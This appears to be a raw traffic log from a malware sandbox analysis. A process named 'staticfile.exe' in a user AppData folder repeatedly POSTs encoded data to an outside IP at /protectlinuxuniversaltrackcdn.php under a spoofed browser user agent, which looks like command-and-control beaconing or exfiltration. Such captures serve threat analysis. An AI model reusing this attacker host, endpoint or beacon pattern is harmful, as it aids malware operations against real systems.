                                        Nov 30, 2024 22:35:46.901973009 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:47.297281981 CET324INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 5c 3f 16 32 5b 2b 06 32 00 3a 3f 27 0d 24 28 39 5e 2c 3d 08 01 28 5c 35 5b 2a 02 0f 56 21 5e 28 05 3c 3a 36 57 27 26 3d 02 3c 01 2b 5e 0c 1b 23 1a 3f 5d 3d 59 24 2b 34 5d 25 30 0e 13 36 0f 2b 5e 26 2d 31 0c 2b 06 22 17 37 32 26 17 38 32 2e 0a 26 2a 24 12 3d 3f 27 56 22 13 2f 56 0b 12 22 51 33 32 0b 5f 26 3f 0e 5b 23 20 2a 5f 23 35 21 05 20 01 0b 56 22 06 32 1f 3c 3d 3a 5f 20 0a 3c 57 29 13 2a 07 26 54 2b 1a 29 17 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #\?2[+2:?'$(9^,=(\5[*V!^(<:6W'&=<+^#?]=Y$+4]%06+^&-1+"72&82.&*$=?'V"/V"Q32_&?[# *_#5! V"2<=:_ <W)*&T+)/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449733213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:45.855330944 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:46.200066090 CET2544OUTData Raw: 50 5e 59 5d 50 59 50 5f 55 5c 57 59 50 5f 5a 51 58 59 5b 5f 51 5b 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y]PYP_U\WYP_ZQXY[_Q[S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B+=6X#T4Y%=;8 $((V'=<*C#X /%$+%*Z.._/%^/0
                                        Nov 30, 2024 22:35:47.210159063 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:47.453876972 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449736213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:47.701167107 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:48.059494972 CET2544OUTData Raw: 50 5d 5c 5d 50 58 50 5e 55 5c 57 59 50 5c 5a 54 58 5b 5b 5c 51 58 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]\]PXP^U\WYP\ZTX[[\QXS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(.Y4"4_&> \-<7$8'$$*C##/S3>'$ *-._/%^/
                                        Nov 30, 2024 22:35:49.007854939 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:49.240472078 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:48 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.449738213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:49.493200064 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:49.890350103 CET2544OUTData Raw: 55 50 5c 58 55 5a 50 51 55 5c 57 59 50 59 5a 55 58 5f 5b 5a 51 5f 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UP\XUZPQU\WYPYZUX_[ZQ_SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+)!1$1.;8<018 0=)%#\",23=81#&9$._/%^/(
                                        Nov 30, 2024 22:35:50.906115055 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:51.159209013 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:50 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.449740213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:51.399032116 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:51.747014999 CET2544OUTData Raw: 55 5a 5c 5e 55 5f 55 5a 55 5c 57 59 50 5c 5a 5c 58 5a 5b 5f 51 51 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\^U_UZU\WYP\Z\XZ[_QQSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<1!"1.?;Z<%<W$=)%#/2&=413*_.4._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.449741213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:52.430706024 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:52.778690100 CET1428OUTData Raw: 55 50 5c 5f 55 54 50 5a 55 5c 57 59 50 52 5a 55 58 5e 5b 5a 51 5c 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UP\_UTPZU\WYPRZUX^[ZQ\S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+6Y!2;18]/?S%+',(5#<!3=&0!.$._/%^/
                                        Nov 30, 2024 22:35:54.823888063 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:55.065795898 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:54 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 1b 2b 01 3a 10 29 3b 2e 00 2e 3c 2c 55 31 38 2d 5a 3b 13 2a 00 29 2a 29 5f 2a 2c 21 10 23 38 30 00 2b 17 31 0d 24 35 35 05 2a 3b 2b 5e 0c 1b 20 07 3f 2b 2e 07 33 3b 0a 5c 33 09 20 5a 35 0f 02 02 26 3e 25 0e 3f 38 21 04 20 21 21 09 3b 0c 35 57 25 17 38 5a 3e 06 23 1c 36 29 2f 56 0b 12 22 57 30 1c 04 02 24 3f 30 58 20 09 39 07 22 35 3d 00 23 3c 22 0a 21 3b 2e 5b 2b 10 22 5f 21 30 20 51 3d 03 39 5f 32 1c 24 0c 3e 2d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #+:);..<,U18-Z;*)*)_*,!#80+1$55*;+^ ?+.3;\3 Z5&>%?8! !!;5W%8Z>#6)/V"W0$?0X 9"5=#<"!;.[+"_!0 Q=9_2$>-/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.449742213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:52.572865963 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:52.920094967 CET2536OUTData Raw: 50 5c 59 5a 50 5a 50 59 55 5c 57 59 50 5b 5a 55 58 58 5b 59 51 50 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\YZPZPYU\WYP[ZUXX[YQPSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(.!#T#%X+;V&;33[=/4%R'.8&36,$._/%^/$
                                        Nov 30, 2024 22:35:53.893058062 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:54.128705025 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:53 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.449743213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:54.366714001 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:54.715827942 CET2544OUTData Raw: 55 5d 59 5c 55 58 50 59 55 5c 57 59 50 5f 5a 5c 58 5a 5b 5c 51 5d 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]Y\UXPYU\WYP_Z\XZ[\Q]STU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B*.-4&./<%U0$)4W$>#&#.._/%^/0
                                        Nov 30, 2024 22:35:55.731688976 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:35:55.970105886 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:35:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.449744213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:56.305135012 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:35:56.654090881 CET2544OUTData Raw: 55 5d 5c 59 50 5f 50 59 55 5c 57 59 50 5a 5a 51 58 5a 5b 59 51 5b 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]\YP_PYU\WYPZZQXZ[YQ[SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?=&]!"8&.</,<%+0.#Y=5$4Y93^$3.X-$._/%^/$
                                        Nov 30, 2024 22:35:58.772268057 CET176INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 35 3a 35 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:35:57 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Content-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.449745213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:35:59.298748970 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:35:59.653382063 CET2544OUTData Raw: 50 5e 59 5f 55 5d 50 5e 55 5c 57 59 50 5d 5a 5d 58 54 5b 5d 51 5d 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^Y_U]P^U\WYP]Z]XT[]Q]S]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D?=-!"3&.8Z-,V1('0=,)?Z",%S3.(10=-$._/%^/8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449746213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:00.196237087 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1376
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:00.543950081 CET1376OUTData Raw: 50 5e 5c 5d 55 5e 55 58 55 5c 57 59 50 5b 5a 54 58 5c 5b 5a 51 5a 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^\]U^UXU\WYP[ZTX\[ZQZS]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E?>:_41+&<[;/%+07*%< V&=4%3_-._/%^/,
                                        Nov 30, 2024 22:36:01.558008909 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:01.798051119 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:01 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 05 2b 16 00 10 28 28 03 58 2e 2f 02 57 26 16 3d 5a 2c 3d 0b 59 28 14 14 03 2a 3f 31 1f 36 28 06 00 2b 5f 35 0f 33 35 35 05 28 3b 2b 5e 0c 1b 20 40 28 5d 35 16 33 2b 0a 5e 33 30 20 5f 21 32 24 06 24 3d 31 0b 28 5e 3a 14 34 32 21 0b 2f 22 07 53 31 3a 20 58 3e 06 2f 52 22 03 2f 56 0b 12 21 0f 26 21 39 5e 25 11 23 01 23 0e 21 01 21 08 2a 5a 34 3c 3d 1d 35 06 2e 11 3f 00 07 02 34 23 02 56 2a 2d 3d 5a 25 21 30 09 2a 2d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: +((X./W&=Z,=Y(*?16(+_5355(;+^ @(]53+^30 _!2$$=1(^:42!/"S1: X>/R"/V!&!9^%##!!*Z4<=5.?4#V*-=Z%!0*-/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449747213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:00.319439888 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:00.668963909 CET2544OUTData Raw: 55 5c 5c 5e 50 5e 55 5b 55 5c 57 59 50 59 5a 53 58 5c 5b 58 51 59 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\^P^U[U\WYPYZSX\[XQYSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+-2^ (^&X \;<'W%8 W'4=;Z Y:$ &#>X:4._/%^/(
                                        Nov 30, 2024 22:36:01.836359024 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:02.091310024 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:01 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449748213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:02.498795986 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:02.856750011 CET2544OUTData Raw: 55 5f 5c 5f 50 59 55 5f 55 5c 57 59 50 58 5a 52 58 5e 5b 5a 51 5b 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_\_PYU_U\WYPXZRX^[ZQ[S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!B+=*\#<^%$^;?T&;('<) $,%U)94._/%^/,
                                        Nov 30, 2024 22:36:03.906862020 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:04.159184933 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:03 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449749213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:04.408565998 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:04.765516996 CET2544OUTData Raw: 55 5a 59 5e 50 5f 55 5f 55 5c 57 59 50 53 5a 5d 58 5e 5b 52 51 5e 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZY^P_U_U\WYPSZ]X^[RQ^SUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<>&]42?%,\,&(4R3=?=&/[ 3.713*_-4._/%^/
                                        Nov 30, 2024 22:36:06.045859098 CET232INHTTP/1.1 100 Continue
